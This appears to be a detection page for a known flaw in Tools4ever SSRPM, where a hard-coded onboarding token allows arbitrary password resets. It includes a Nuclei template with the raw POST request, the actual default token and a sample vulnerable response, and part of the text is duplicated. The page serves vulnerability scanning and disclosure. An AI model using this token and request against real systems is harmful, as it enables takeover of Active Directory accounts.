SSRPM (Self-Service Reset Password Manager) is Tools4ever’s premier password self-service solution. It allows organizations of all sizes to unburden their helpdesk and empower their end users regarding forgotten passwords and account management.
This solution is usually synchronized with an on-premise Active Directory and its Client Web Interface component is usually exposed to the Internet.
The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
Issuing a POST request on the endpoint /Onboarding/Import using the default OnboardingToken can determine if the targeted installation is affected by this vulnerability.
If it is, it will return an HTTP response with the ErrorCode value -55
Nuclei Template:
generated using ProjectDiscoveryAI Tool
id: tools4ever-ssrpm-arbitrary-password-reset
info:
name: Tools4Ever SSRPM Arbitrary Password Reset
author: ProjectDiscoveryAI
severity: high
description: |
Tools4Ever SSRPM is vulnerable to arbitrary password reset due to improper validation of the onboarding token, allowing attackers to take control of certain accounts.
reference:
- https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
http:
- raw:
- |
POST /Onboarding/Import HTTP/1.1
Host: {{Hostname}}
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action=testIntrinsec
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"ErrorCode":-55'
- '"Success":false'
Example of response of a vulnerable target:
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 12:33:52 GMT
Server: XXX
Set-Cookie: ASP.NET_SessionId=2iaeferfvwc0j3f30bbjvlmt; path=/; HttpOnly;
SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self';
Strict-Transport-Security: max-age=31536000
Content-Length: 133
{"Success":false,"ErrorCode":-55,"ErrorMessage":"An error occurred. Please
contact your system administrator if the issue persists."}
Template Information:
SSRPM (Self-Service Reset Password Manager) is Tools4ever’s premier password self-service solution. It allows organizations of all sizes to unburden their helpdesk and empower their end users regarding forgotten passwords and account management. This solution is usually synchronized with an on-premise Active Directory and its Client Web Interface component is usually exposed to the Internet. The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
Issuing a POST request on the endpoint /Onboarding/Import using the default
OnboardingToken
can determine if the targeted installation is affected by this vulnerability. If it is, it will return an HTTP response with the ErrorCode value -55Nuclei Template:
generated using ProjectDiscoveryAI Tool
Example of response of a vulnerable target:
HTTP/1.1 200 OK Date: Tue, 25 Jun 2024 12:33:52 GMT Server: XXX Set-Cookie: ASP.NET_SessionId=2iaeferfvwc0j3f30bbjvlmt; path=/; HttpOnly; SameSite=Lax Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self'; Strict-Transport-Security: max-age=31536000 Content-Length: 133 {"Success":false,"ErrorCode":-55,"ErrorMessage":"An error occurred. Please contact your system administrator if the issue persists."}